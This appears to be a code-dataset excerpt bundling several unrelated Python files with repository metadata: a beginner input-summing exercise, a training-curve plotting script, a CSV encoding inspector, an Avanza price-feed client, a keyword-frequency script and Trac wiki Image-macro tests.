] | null | null | null | class-notes/renshu_mondai/ex2-r.py | rhoenkelevra/python_simple_applications | 28ceb5f9fe7ecf11d606d49463385e92927e8f98 | [
"MIT"
] | null | null | null | total = 0
count = 0
while True:
num = input("入力してください。:")
if num == "End":
break
total += int(num)
count += 1
print(str(count)+"回入力しました。")
print("合計は"+str(total)+"です。") | 19.2 | 29 | 0.546875 |
deca6e26c03dd6334482e5251a0c4154237542ea | 4,731 | py | Python | src/utils/visualization/paper_plot.py | oval-group/pl-cnn | 75f06630c755168771d049b7dbca300a21f27267 | [
"MIT"
] | 8 | 2017-02-19T20:19:18.000Z | 2020-05-23T03:06:08.000Z | src/utils/visualization/paper_plot.py | oval-group/pl-cnn | 75f06630c755168771d049b7dbca300a21f27267 | [
"MIT"
] | null | null | null | src/utils/visualization/paper_plot.py | oval-group/pl-cnn | 75f06630c755168771d049b7dbca300a21f27267 | [
"MIT"
] | 5 | 2017-04-07T14:35:11.000Z | 2020-03-12T19:11:16.000Z | import numpy as np
import os
import cPickle as pickle
import seaborn as sns
import matplotlib
import matplotlib.pyplot as plt
color_set = "Set1"
sns.set(style="white", palette=color_set)
colors = sns.color_palette(color_set)
def plot(xp_dir, export_pdf, show):
if os.path.exists('{}/log_mnist.txt'.format(xp_dir)):
dataset = 'mnist'
elif os.path.exists('{}/log_cifar10.txt'.format(xp_dir)):
dataset = 'cifar10'
elif os.path.exists('{}/log_cifar100.txt'.format(xp_dir)):
dataset = 'cifar100'
else:
raise NotImplementedError('Could not find appropriate log file in {}'
.format(xp_dir))
fig = plt.figure(figsize=(12, 6))
matplotlib.rcParams.update({'font.size': 13})
matplotlib.rc('xtick', labelsize=10)
nb = 0
for solver in ["adagrad", "adadelta", "adam"]:
sns.set(style="white", palette=color_set)
ax1 = fig.add_subplot(231 + nb)
sns.set(style="white", palette=color_set)
ax2 = fig.add_subplot(234 + nb)
nb += 1
base = pickle.load(open("%s/%s_%s_svm_results.p" %
(xp_dir, dataset, solver), "rb"))
lwsvm = pickle.load(open("%s/%s_%s_svm_lwsvm_results.p" %
(xp_dir, dataset, solver), "rb"))
start_epoch = base['save_at']
# join end of SGD and beginning of LWSVM
lwsvm['time_stamp'] = np.array([0] + lwsvm['time_stamp']) / 3600. + \
base['time_stamp'][start_epoch] / 3600.
base['time_stamp'] = np.array(base['time_stamp']) / 3600.
lwsvm['train_objective'] = [base['train_objective'][start_epoch]] + \
lwsvm['train_objective']
lwsvm['train_accuracy'] = [base['train_accuracy'][start_epoch]] + \
lwsvm['train_accuracy']
lwsvm['val_accuracy'] = [base['val_accuracy'][start_epoch]] + \
lwsvm['val_accuracy']
# find stop index for SGD (index of SGD where LWSVM stops)
try:
stop = [i for i in range(len(base['time_stamp']))
if base['time_stamp'][i] > lwsvm['time_stamp'][-1]][0]
except:
stop = -1
stop = -1
# don't display first epochs (scaling reasons)
start = 0
train_objective1, = \
ax1.plot(base['time_stamp'][start: start_epoch],
base['train_objective'][start: start_epoch],
label="%s" % solver.title())
train_objective2, = \
ax1.plot(lwsvm['time_stamp'],
lwsvm['train_objective'],
label="LW_SVM")
ax1_handles = [train_objective1, train_objective2]
ax1.plot(base['time_stamp'][start: stop],
base['train_objective'][start: stop],
color=colors[0], alpha=0.5)
train_accuracy1, = \
ax2.plot(base['time_stamp'][start: start_epoch],
base['train_accuracy'][start: start_epoch],
label="Training %s" % solver.title())
train_accuracy2, = \
ax2.plot(lwsvm['time_stamp'], lwsvm['train_accuracy'],
label="Training LW-SVM")
val_accuracy1, = \
ax2.plot(base['time_stamp'][start: start_epoch],
base['val_accuracy'][start: start_epoch],
label="Validation %s" % solver.title())
val_accuracy2, = \
ax2.plot(lwsvm['time_stamp'],
lwsvm['val_accuracy'],
label="Validation LW-SVM")
ax2_handles = [train_accuracy1, train_accuracy2,
val_accuracy1, val_accuracy2]
ax2.plot(base['time_stamp'][start: stop],
base['train_accuracy'][start: stop],
color=colors[0], alpha=0.5)
ax2.plot(base['time_stamp'][start: stop],
base['val_accuracy'][start: stop],
color=colors[2], alpha=0.5)
ax1.legend(handles=ax1_handles)
ax2.legend(handles=ax2_handles, loc=4)
if dataset == "mnist":
ax1.set_ylim([0.02, 0.1])
ax2.set_ylim([96, 100])
if dataset == "cifar10":
ax1.set_ylim([0, 0.15])
ax2.set_ylim([45, 101])
if dataset == "cifar100":
ax1.set_ylim([0, 0.4])
ax2.set_ylim([0, 101])
if solver == "adagrad":
ax2.set_ylabel("Accuracy (%)")
ax1.set_ylabel("Training Objective Function")
if solver == "adadelta":
ax2.set_xlabel("Time (h)")
if export_pdf:
plt.savefig(export_pdf, bbox_inches='tight', pad_inches=0)
if show:
plt.show()
| 34.786765 | 77 | 0.544917 |
8ebb59e3110d45ea7448ac2d1a9172aba8ee2908 | 8,393 | py | Python | SqltDAO/SchemaDef/DataDetective.py | soft9000/PyDAO | 1316bdf34b62187b7763c2c7dd0036837cdcc894 | [
"MIT"
] | 8 | 2018-03-10T05:33:58.000Z | 2019-01-25T08:32:27.000Z | SqltDAO/SchemaDef/DataDetective.py | soft9000/PyDAO | 1316bdf34b62187b7763c2c7dd0036837cdcc894 | [
"MIT"
] | null | null | null | SqltDAO/SchemaDef/DataDetective.py | soft9000/PyDAO | 1316bdf34b62187b7763c2c7dd0036837cdcc894 | [
"MIT"
] | 6 | 2018-10-15T17:07:28.000Z | 2019-02-03T21:49:54.000Z | #!/usr/bin/env python3
# 2019/01/07: Class Created
# Status: Work-In-Progress
# - Refactored + minor updates. Code paths needs re-testing.
import os.path
import csv
class Inspector:
'''
Line oriented: A field-independant way to scan for the
encoding + successfull reading of a partial / complete,
textual, data-file.
'''
ENCODINGS = (None, 'utf-8', 'utf-16')
@staticmethod
def _count_lines(fh, line_max=-1):
''' internal use only '''
tally = 0
bokay = False
if fh:
try:
for line in fh:
tally += 1
if line_max >= 0:
if tally >= line_max:
break
bokay = True
except:
pass
return tally, bokay
@staticmethod
def Tally(fqfile, line_max=-1):
'''
Check to see how many lines (#) are in a data-file.
The 2nd result is the file encoding. None = Classic / ASCII encoding.
The 3rd result is boolean. Indicates if the file was read completely ('toeof.')
Use line_max to prevent huge line-scans.
Safe function - no exceptions are thrown.
Result examples:
(#, None, toeof) = Default encoding (classic bytes)
(#, 'utf-8', toeof) = Unicode encoding (8 / 16 supported)
'''
rtype = None
zmax = 0
bokay = False
for ztype in Inspector.ENCODINGS:
try:
fh = open(fqfile, 'r', encoding=ztype)
count = Inspector._count_lines(fh, line_max)
if count[0] > zmax:
zmax = count[0]
bokay = count[1]
rtype = ztype
except:
try:
close(fh)
except:
pass
finally:
try:
close(fh)
except:
pass
results = zmax, rtype, bokay
return results
class InspectorCSV:
'''
What to do when the user selects 'csv,' but things go boom.
Emphasis is upon Unicode detection + data-file conversion / re-writing
to a FIXED_TAB or FIXED_PIPE format.
'''
FIXED_TAB = ("\t", ".fxtab")
FIXED_PIPE = ("|", ".fxpip")
@staticmethod
def _encode(dlct):
''' internal use only '''
if not dlct:
return dict()
pie = dlct()
return {
"delimiter":pie.delimiter,
"doublequote":pie.doublequote,
"doublequote":pie.doublequote,
"quotechar":pie.quotechar,
"skipinitialspace":pie.skipinitialspace,
"quoting":pie.quoting,
"lineterminator":pie.lineterminator
}
@staticmethod
def Detect(fqfile, max_lines=20):
'''
Detect file type, as well as how many lines can be read from same.
Exception on error, else tuple with number read (#,) and encoding.
Successfull result examples:
(#, None, toeof) = Default encoding (classic bytes)
(#, 'utf-8', toeof) = Unicode encoding (8 / 16 supported)
'''
if not fqfile:
raise Exception("Input file is 'None'")
if not os.path.exists(fqfile):
raise Exception("Input file not found")
max_read = 0
encoding = None
bokay = False
fh = None
for ztype in Inspector.ENCODINGS:
try:
result = 0
fh = open(fqfile, encoding=ztype)
result = Inspector._count_lines(fh, line_max=max_lines)
if result[0] > max_read:
max_read = result[0]
bokay = result[1]
encoding = ztype
except:
if fh:
try:
fh.close()
except:
pass
continue # Next encoding!
results = max_read, encoding, bokay
return results
@staticmethod
def Sniff(fqfile, max_lines=20):
'''
Use the CSV 'Sniffer. Will not work on piped data.
Returns strinigified dialect detected, or None.
No exceptions are thrown.
Successfull result examples:
(#, None, toeof) = Default encoding (classic bytes)
(#, 'utf-8', toeof) = Unicode encoding (8 / 16 supported)
'''
if not fqfile:
return None
popSel = dict()
bokay = False
fh = None
for ztype in Inspector.ENCODINGS:
try:
pop = dict()
result = 0
fh = open(fqfile, 'r', encoding=ztype)
zcount = Inspector._count_lines(fh, line_max=max_lines)
try:
fh.close()
except:
pass
if not zcount[0]: # no lines
continue
if not zcount[1]: # no completion
continue
total = max_lines
if total > zcount[0]:
total = zcount[0]
sn = csv.Sniffer()
fh = open(fqfile, 'r', encoding=ztype)
for ss, line in enumerate(fh):
if ss > total:
break
zdlg = sn.sniff(line)
if zdlg:
code = str(InspectorCSV._encode(zdlg))
if code in pop:
pop[code] = pop[code] + 1
else:
pop[code] = 1
fh.close()
popSel = pop
bokay = True
except Exception as ex:
bokay = False
continue
finally:
if fh:
try:
fh.close()
except:
pass
zmax = 0
result = None
for key in popSel:
if popSel[key] > zmax:
zmax = popSel[key]
result = key
return zmax, result, bokay
@staticmethod
def Convert(fqfile, sep=FIXED_PIPE):
'''
Copy a data-file using a unified delimiter + factorized file-type suffix.
Exception on error, else tuple with total lines (#), encoding, and result-file name.
Successfull result examples:
(#, None, fq_output) = Default encoding (classic bytes)
(#, 'utf-8', fq_output) = Unicode encoding (8 / 16 supported)
'''
try:
tr = InspectorCSV.Detect(fqfile)
pig = fqfile + sep[1]
if os.path.exists(pig):
os.unlink(pig)
fh = open(fqfile, 'r', encoding=ztype)
if tr[1]:
pig = fqfile + '.' + tr[1] + sep[1]
fout = open(pig, 'w', encoding=tr[1])
else:
fout = open(pig, 'w')
lines = csv.reader(fh)
for ss, line in enumerate(lines, 1):
print(*line,sep=sep[0], file=fout)
max_read = ss
encoding = tr[1]
if ss >= tr[0]:
return max_read, encoding, pig
raise Exception("Partial file read: {}/{}".format(ss,tr[0]))
except Exception as ex:
raise(ex)
finally:
try:
close(fh)
close(fout)
except:
pass
raise Exception("File format error.")
if __name__ == "__main__":
#R-n-D: Please ignore.
#file = '../../../PyDAO-Student-Stats/RawData/Udemy/Py1200_Practice_2019-01-08_10-33-57.csv'
#print(InspectorCSV.Convert(file, InspectorCSV.FIXED_TAB))
file = '../DaoTest01/nasdaqlisted.txt'
#print(InspectorCSV.Sniff(file))
print(Inspector.Tally(file))
| 32.657588 | 97 | 0.454426 |
59a3797945b4c7727a66b8dee81fa15ee4101a62 | 3,939 | py | Python | src/investmentstk/data_feeds/avanza_feed.py | fernandobrito/investments-toolkit | 40663857d83ec99be7aecd78cf50d092c7144d8f | [
"Apache-2.0"
] | 3 | 2021-08-23T16:47:22.000Z | 2021-11-19T12:41:19.000Z | src/investmentstk/data_feeds/avanza_feed.py | fernandobrito/investments-toolkit | 40663857d83ec99be7aecd78cf50d092c7144d8f | [
"Apache-2.0"
] | 14 | 2021-08-28T14:17:50.000Z | 2021-11-28T20:12:54.000Z | src/investmentstk/data_feeds/avanza_feed.py | fernandobrito/investments-toolkit | 40663857d83ec99be7aecd78cf50d092c7144d8f | [
"Apache-2.0"
] | 1 | 2021-11-04T06:51:32.000Z | 2021-11-04T06:51:32.000Z | from zoneinfo import ZoneInfo
import requests
from datetime import datetime
from typing import Optional, Mapping
from investmentstk.data_feeds.data_feed import DataFeed, TimeResolution
from investmentstk.models.bar import Bar
from investmentstk.models.barset import BarSet
from investmentstk.models.price import Price
from investmentstk.persistence.requests_cache import requests_cache_configured
TIME_RESOLUTION_TO_AVANZA_API_RESOLUTION_MAP = {
TimeResolution.day: "day",
TimeResolution.week: "week",
TimeResolution.month: "month",
}
TIME_RESOLUTION_TO_AVANZA_API_TIME_RANGE_MAP = {
TimeResolution.day: "one_year",
TimeResolution.week: "three_years",
TimeResolution.month: "infinity",
}
class AvanzaFeed(DataFeed):
"""
A client to retrieve data from Avanza
A simpler implementation, and inspired by:
* https://github.com/Qluxzz/avanza/blob/master/avanza/avanza.py
* https://github.com/alrevuelta/avanzapy/blob/master/avanzapy/avanzapy.py
"""
@requests_cache_configured()
def _retrieve_bars(
self,
source_id: str,
*,
resolution: TimeResolution = TimeResolution.day,
instrument_type: Optional[str] = "stock",
) -> BarSet:
"""
Uses the same public API used by their public price page.
Example: https://www.avanza.se/aktier/om-aktien.html/5269/volvo-b
:param source_id: the internal ID used in Avanza
:param instrument_type:
:return: a BarSet
"""
response = requests.get(
f"https://www.avanza.se/_api/price-chart/{instrument_type}/{source_id}",
params={
"timePeriod": TIME_RESOLUTION_TO_AVANZA_API_TIME_RANGE_MAP[resolution],
"resolution": TIME_RESOLUTION_TO_AVANZA_API_RESOLUTION_MAP[resolution],
},
)
response.raise_for_status()
bars: BarSet = set()
data = response.json()
for ohlc in data["ohlc"]:
bars.add(self._ohlc_to_bar(ohlc))
return bars
@requests_cache_configured()
def retrieve_asset_name(self, source_id: str, instrument_type: Optional[str] = "stock") -> str:
"""
Retrieves the name of an asset
:param source_id: the internal ID used in Avanza
:param instrument_type:
:return: the asset name (ticker)
"""
response = requests.get(f"https://www.avanza.se/_mobile/market/{instrument_type}/{source_id}")
response.raise_for_status()
return response.json()["tickerSymbol"]
def retrieve_price(self, source_id: str, instrument_type: Optional[str] = "stock") -> Price:
response = requests.get(f"https://www.avanza.se/_mobile/market/{instrument_type}/{source_id}")
response.raise_for_status()
data = response.json()
return Price(last=data["lastPrice"], change=data["change"], change_pct=data["changePercent"])
@classmethod
def _ohlc_to_bar(cls, ohlc: Mapping) -> Bar:
"""
Converts a bar OHLC representation from Avanza into our
representation.
"""
"""
Timestamps from Avanza come in CET time. When retrieving daily bars,
a bar for the close of the day 2021-09-03 will be 1630620000000,
which is "Friday, September 3, 2021 12:00:00 AM GMT+02:00 DST".
If I treat that as a UTC timestamp, I get "Thursday, September 2, 2021 10:00:00 PM",
which is the day before.
However, I had issues with pandas when I tried to create a dataframe
with a timezone aware datetime, so I drop the timezone info.
"""
local_tz = ZoneInfo("Europe/Stockholm")
return Bar(
time=datetime.fromtimestamp(ohlc["timestamp"] / 1000, tz=local_tz).replace(tzinfo=None),
open=ohlc["open"],
high=ohlc["high"],
low=ohlc["low"],
close=ohlc["close"],
)
| 33.666667 | 102 | 0.65575 |
276334bb3f657f94e88a758c2ddf634025db6af8 | 11,720 | py | Python | i-data-structures/redundant_keywords.py | eda-ricercatore/python-sandbox | 741d23e15f22239cb5df8af6e695cd8e3574be50 | [
"MIT"
] | null | null | null | i-data-structures/redundant_keywords.py | eda-ricercatore/python-sandbox | 741d23e15f22239cb5df8af6e695cd8e3574be50 | [
"MIT"
] | null | null | null | i-data-structures/redundant_keywords.py | eda-ricercatore/python-sandbox | 741d23e15f22239cb5df8af6e695cd8e3574be50 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python3
import statistics
from collections import Counter
list_of_keywords = ["human-animal coexistence", "human-animal coexistence - recommendations", "transforming our mental & physical & spiritual lives", "antidote to the growing epidemic of human loneliness", "growing epidemic of human loneliness", "epidemic of human loneliness", "human loneliness", "loneliness", "loneliness - social challenge", "human loneliness - epidemic of", "loneliness - epidemic of", "empathy", "empathy-building interventions", "dogs teaching children ethical behavior", "animal-assisted therapy", "animal-assisted therapy - for loneliness", "mental health", "mental health issues", "mental health practice", "human-animal relationships", "spiritual health", "wildlife relocation", "growing populations of wild species in urban areas are blurring the lines between domestic and wild animals", "urban areas with growing populations of wild species", "therapeutic use of animals", "animals - therapeutic use of", "human-animal communication", "biological species loneliness", "human exceptionalism", "human exceptionalism - altered view of", "human-animal communication - life-changing encounters with animals", "human loneliness - aching hearts", "loneliness - aching hearts", "human-animal coexistence - wild animals & domestic animals & robotic pets", "herping", "US herping", "animal-assisted self-care", "human-animal coexistence - wildlife & therapy & pet effect", "uncanny valley of lifelike humanoid robots & realistic computer-generated faces", "virtual worlds", "virtual communities", "alternative universe", "age of connectedness", "cohabitation", "cohabitation - new contract for", "neophiles", "neophiliacs", "neophilia", "neophobia", "neophobes", "metathesiophobia", "prosophobia", "cainotophobia", "cainophobia", "kainophobia", "kainolophobia", "built environment", "built world", "urbanism - human interaction with wildlife in the built environment", "urbanism - human interaction with wildlife in the built world", "landscape urbanism", "green urbanism", "sustainable urbanism", "sustainable corridors", "biophilia hypothesis", "BET", "habitat fragmentation", "habitat fragmentation caused by urbanization", "habitat fragmentation caused by human development", "habitat fragmentation - exogenous threats", "habitat fragmentation - exogenous threats due to habitat degradation & habitat subdivision & habitat isolation", "habitat fragmentation - endogenous threats", "edge effects of habitat degradation", "edge effects of urbanism-driven habitat degradation", "microenvironments", "forest fragmentation", "island biogeography", "habitat destruction", "habitat loss", "habitat reduction", "habitat destruction caused by urbanization", "habitat loss caused by urbanization", "habitat reduction caused by urbanization", "deforestation", "clearance (deforestation)", "clearcutting (deforestation)", "clearing (deforestation)", "edge effects of urbanism-driven habitat degradation - increasing probabilities of human interaction with wildlife", "edge effects of urbanism-driven habitat degradation - increasing probabilities of human interaction with wildlife increases need for intelligent urbanism", "ecological habitats", "habitats (ecology)", "community (ecology)", "community ecology", "synecology", "macroecology", "microecosystems", "systems ecology", "ecosystems ecology", "ecological engineering", "human impact on the environment", "anthropogenic impact on the environment", "community resilience", "environmental issues", "relationship between urbanization & environmental issues", "impact of urbanization on biophysical environments", "evolutionary ecology", "sociobiology", "human behavioral ecology", "HBE", "human evolutionary ecology", "Darwinian anthropology", "biosemiotics", "social evolution", "ecosystem health", "human impact on the environment - due to urbanization", "relationship between urbanization & ecosystem health", "impact of urbanization on ecosystem health", "environmental epidemiology", "communicable disease epidemiology", "cultural epidemiology", "relationship between urbanization & deforestation & ecosystem health", "impact of urbanization & deforestation on ecosystem health", "exposure science", "ecosystem management", "ecosystem-based management", "natural resource management", "ecological health", "microhabitats", "spatial ecology", "spatial dynamics of population & community ecology", "population ecology", "autecology", "species distribution", "population dynamics", "deep ecology", "ecological stoichiometry", "biological stoichiometry", "environmental humanities", "ecological humanities", "cross-boundary subsidies", "habitat patch boundaries", "patches (landscape ecology)", "patch dynamics", "matrices (background ecological system)", "landscape ecology", "landscape connectivity", "biogeography", "historical biogeography", "ecological biogeography", "comparative biogeography", "systematic biogeography", "evolutionary biogeography", "biogeographic regionalization", "ecological disturbances", "natural disturbances (ecology)", "anthropogenic disturbances (ecology)", "major ecological disturbances", "cyclic disturbances (ecology)", "ecological succession (ecology)", "ecological succession", "human-wildlife conflict", "interaction between wild animals & humans", "interaction between wild animals & humans - negative impact on people & animals & resources & habitats", "interaction between wild animals & humans - growing human populations overlap with established wildlife territory & creating competition for space and resources", "interaction between wild animals & humans - loss of life & injury to humans and wild animals & depredation of livestock & degradation of habitat", "forest dynamics", "forest disturbances", "environmental stressors", "daily 'stress' events", "chemical stressors", "ecotones", "ecotone transitions", "ecoclines", "ecocline transitions", "ecotypes", "ecospecies", "landscape epidemiology", "metapopulations", "resource selection functions", "RSFs", "source-sink dynamics", "habitat/species management areas", "human development (economics)", "environmental security", "health security (human security)", "human security", "personal security", "community security", "political security", "wildlife crossings", "habitat conservation", "habitat fragmentation due to human-made barriers", "habitat fragmentation due to human-made barriers - roads & railroads & canals & electric power lines & pipelines", "wildlife populations", "wildlife populations affected by demographic & genetic & environmental stochasticity", "wildlife populations affected by demographic stochasticity", "wildlife populations affected by genetic stochasticity", "wildlife populations affected by environmental stochasticity", "restoration ecology", "ecological restoration", "community assembly (community ecology)", "conservation biology", "anthropogenic impact on ecosystems", "wildlife corridors", "habitat corridors", "green corridors", "generalist species", "specialist species", "SLOSS debate in ecology & conservation biology about single large or several small reserves", "edge effects (ecology)", "urban homesteading", "sustainable living", "urban agriculture", "urban gardening", "urban farming", "peri-urban agriculture"]
a = max(list_of_keywords, key=list_of_keywords.count)
print("a is:",a,"=")
"""
Uncomment the next line if elements in the list have different occurring frequencies.
"""
#############print("mode is:", statistics.mode(list_of_keywords),"=")
"""
From https://www.geeksforgeeks.org/python-list-frequency-of-elements/
Last accessed on May 18, 2020.
Author: manjeet_04.
No date of publication.
"""
print("Test methods from: https://www.geeksforgeeks.org/python-list-frequency-of-elements/")
print("Method 1.")
res = dict(Counter(i for i in list_of_keywords))
#print("The list frequency of elements is: ", str(res), "=")
for j in res:
print("j is:",j,"with count:",res[j],"=")
"""
Method cannot work for a list/set, because it works for a set of sets,
or list of lists, or container of containers.
print("Method 2.")
from itertools import chain
res = dict(Counter(chain.from_iterable(map(set, list_of_keywords))))
"""
#res = all([val[1] == ])
print("=======================================================")
print(" Test methods on list of keywords with duplicates.")
duplicates_in_list = ["wildlife relocation", "growing populations of wild species in urban areas are blurring the lines between domestic and wild animals", "urban areas with growing populations of wild species", "therapeutic use of animals", "animals - therapeutic use of", "human-animal communication", "biological species loneliness", "human exceptionalism", "human exceptionalism - altered view of", "human-animal communication - life-changing encounters with animals", "human loneliness - aching hearts", "loneliness - aching hearts", "human-animal coexistence - wild animals & domestic animals & robotic pets", "herping", "US herping", "animal-assisted self-care", "human-animal coexistence - wildlife & therapy & pet effect", "uncanny valley of lifelike humanoid robots & realistic computer-generated faces", "virtual worlds", "animals - therapeutic use of", "animals - therapeutic use of", "animals - therapeutic use of", "animals - therapeutic use of", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "virtual worlds", "virtual worlds", "virtual worlds", "human-animal communication", "human-animal communication", "human-animal communication", "human-animal communication", "US herping", "US herping", "loneliness - aching hearts"]
print("mode is:", statistics.mode(duplicates_in_list),"=")
res = sorted(duplicates_in_list, key = lambda ele: duplicates_in_list.count(ele))
for j in res:
#print("j is:",j,"with count:",res[j],"=")
print("j is:",j,"=")
print("res is:",res,"=")
res = dict(Counter(i for i in duplicates_in_list))
for j in res:
print("j is:",j,"with count:",res[j],"=")
print("=======================================================")
print("From: https://stackoverflow.com/a/613218/1531728.")
import operator
print(" = Sorted dict in ascending order.")
res_sorted = {k: v for k, v in sorted(res.items(), key=lambda item: item[1])}
for j_s in res_sorted:
print("j_s is:",j_s,"with count:",res[j_s],"=")
print(" = Sorted dict in descending order.")
res_x = {k: v for k, v in sorted(res.items(), key=lambda item: item[1], reverse=True)}
for j_x in res_x:
print("j_x is:",j_x,"with count:",res[j_x],"=")
"""
sorted_dict = sorted(res.values())
for j_d in sorted_dict:
print("j_d is:",j_d,"with count:",res[j_d],"=")
"""
print("From https://stackoverflow.com/a/22150003/1531728")
res_des = dict(Counter(i for i in duplicates_in_list).most_common())
for j_des in res_des:
# Solution 1.
print("j_des is:",j_des,"with count:",res[j_des],"=")
print("From https://stackoverflow.com/a/7947321/1531728")
for word in sorted(res, key=res.get, reverse=True):
# Solution 2.
print("word is:",word, "and frequency is:",res[word],"=")
print("https://stackoverflow.com/a/50554874/1531728")
res_lst = sorted([(v, k) for k, v in res.items()], reverse=True)
for r in res_lst:
# Solution 3.
print("r is:",r,"=")
for (freq,kwd) in res_lst:
print("f:",freq," and k:",kwd,"=")
"""
References that were looked at, but did not use:
+ https://www.geeksforgeeks.org/python-sort-given-list-by-frequency-and-remove-duplicates/?ref=rp
+ https://www.pythoncentral.io/how-to-sort-python-dictionaries-by-key-or-value/
For more solutions, see:
+ https://stackoverflow.com/q/613183/1531728
""" | 134.712644 | 7,229 | 0.750597 |
fc1c57a6b77db6539cbf64072aa8834ae0179a84 | 29,096 | py | Python | trac/wiki/tests/macros.py | pkdevbox/trac | d044fc469e4dcbc5901c992b1b4160e9cbecee25 | [
"BSD-3-Clause"
] | null | null | null | trac/wiki/tests/macros.py | pkdevbox/trac | d044fc469e4dcbc5901c992b1b4160e9cbecee25 | [
"BSD-3-Clause"
] | null | null | null | trac/wiki/tests/macros.py | pkdevbox/trac | d044fc469e4dcbc5901c992b1b4160e9cbecee25 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2013 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
from StringIO import StringIO
from datetime import datetime
import os
import shutil
import tempfile
import unittest
from trac.config import Option, ListOption, IntOption, BoolOption
from trac.test import locale_en
from trac.util.datefmt import format_date, utc
from trac.wiki.model import WikiPage
from trac.wiki.tests import formatter
def add_pages(tc, names):
now = datetime.now(utc)
for name in names:
w = WikiPage(tc.env)
w.name = name
w.text = '--'
w.save('joe', 'the page ' + name, '::1', now)
# == [[Image]]
def image_setup(tc):
add_pages(tc, ['page:fr'])
from trac.attachment import Attachment
tc.env.path = tempfile.mkdtemp(prefix='trac-tempenv-')
attachment = Attachment(tc.env, 'wiki', 'page:fr')
attachment.description = "image in page:fr"
attachment.insert('img.png', StringIO(''), 0, 2)
tc.env.config.set('interwiki', 'shields', 'https://img.shields.io/')
tc.env.config.set('interwiki', 'travis',
'https://travis-ci.org/$1?branch=$2')
htdocs_location = 'http://assets.example.org/common'
tc.context.req.chrome['htdocs_location'] = htdocs_location
tc.env.config.set('trac', 'htdocs_location', htdocs_location)
def image_teardown(tc):
shutil.rmtree(os.path.join(tc.env.path, 'files'))
os.rmdir(tc.env.path)
tc.env.reset_db()
# Note: using `« test »` string in the following tests for checking
# unicode robustness and whitespace support (first space is
# normal ASCII SPACE, second is Unicode NO-BREAK SPACE).
IMAGE_MACRO_TEST_CASES = u"""
============================== source: Image, no other arguments
[[Image(source:« test ».png)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB.png"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB.png?format=raw" alt="source:« test ».png" title="source:« test ».png" /></a>
</p>
------------------------------
[[Image(...)]]
============================== source: Image, inline
[[Image(source:« test ».png, inline)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB.png"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB.png?format=raw" alt="source:« test ».png" title="source:« test ».png" /></a>
</p>
------------------------------
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB.png"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB.png?format=raw" alt="source:« test ».png" title="source:« test ».png" /></a>
============================== intertrac:source: Image, no other arguments
[[Image(trac:source:/trunk/doc/images/bkgnd_pattern_« test ».png)]]
------------------------------
<p>
<a style="padding:0; border:none" href="http://trac.edgewall.org/intertrac/source%3A/trunk/doc/images/bkgnd_pattern_%C2%AB%20test%C2%A0%C2%BB.png"><img src="http://trac.edgewall.org/intertrac/source%3A/trunk/doc/images/bkgnd_pattern_%C2%AB%20test%C2%A0%C2%BB.png%3Fformat%3Draw" alt="source:/trunk/doc/images/bkgnd_pattern_« test ».png in Trac's Trac" title="source:/trunk/doc/images/bkgnd_pattern_« test ».png in Trac's Trac" /></a>
</p>
============================== source: Image, nolink
[[Image(source:« test », nolink)]]
------------------------------
<p>
<img src="/browser/%C2%AB%20test%C2%A0%C2%BB?format=raw" alt="source:« test »" title="source:« test »" />
</p>
============================== source: Image, normal args
[[Image(source:« test », align=left, title=Test)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB?format=raw" alt="source:« test »" style="float:left" title="Test" /></a>
</p>
============================== source: Image, size arg
[[Image(source:« test », 30%)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB"><img width="30%" alt="source:« test »" title="source:« test »" src="/browser/%C2%AB%20test%C2%A0%C2%BB?format=raw" /></a>
</p>
============================== source: Image, keyword alignment
[[Image(source:« test », right)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB?format=raw" alt="source:« test »" style="float:right" title="source:« test »" /></a>
</p>
============================== http: Image, nolink
[[Image(http://www.edgewall.com/gfx/shredder_« test ».png, nolink)]]
------------------------------
<p>
<img src="http://www.edgewall.com/gfx/shredder_« test ».png" alt="http://www.edgewall.com/gfx/shredder_« test ».png" title="http://www.edgewall.com/gfx/shredder_« test ».png" />
</p>
============================== http: Image, absolute, many ':'
[[Image(http://chart.apis.google.com:80/chart?cht=p3&chd=s:hW&chs=250x100&chl=Héllo|Wôrld, title=Google & Charting, link=)]]
------------------------------
<p>
<img src="http://chart.apis.google.com:80/chart?cht=p3&chd=s:hW&chs=250x100&chl=Héllo|Wôrld" alt="http://chart.apis.google.com:80/chart" title="Google & Charting" />
</p>
============================== // Image, server-relative
[[Image(//browser/« test »?format=raw, link=)]]
------------------------------
<p>
<img src="/browser/« test »?format=raw" alt="/browser/« test »" title="/browser/« test »" />
</p>
============================== / Image, project-relative, link to WikiStart
[[Image(/browser/« test »?format=raw, link=wiki:WikiStart)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/wiki/WikiStart"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB?format=raw" alt="/browser/« test »" title="/browser/« test »" /></a>
</p>
============================== Strip unicode white-spaces and ZWSPs (#10668)
[[Image( source:« test ».png , nolink, 100% )]]
------------------------------
<p>
<img width="100%" alt="source:« test ».png" title="source:« test ».png" src="/browser/%C2%AB%20test%C2%A0%C2%BB.png?format=raw" />
</p>
============================== Attachments on page with ':' characters (#10562)
[[Image("page:fr":img.png,nolink)]]
------------------------------
<p>
<img src="/raw-attachment/wiki/page%3Afr/img.png" alt="image in page:fr" title="image in page:fr" />
</p>
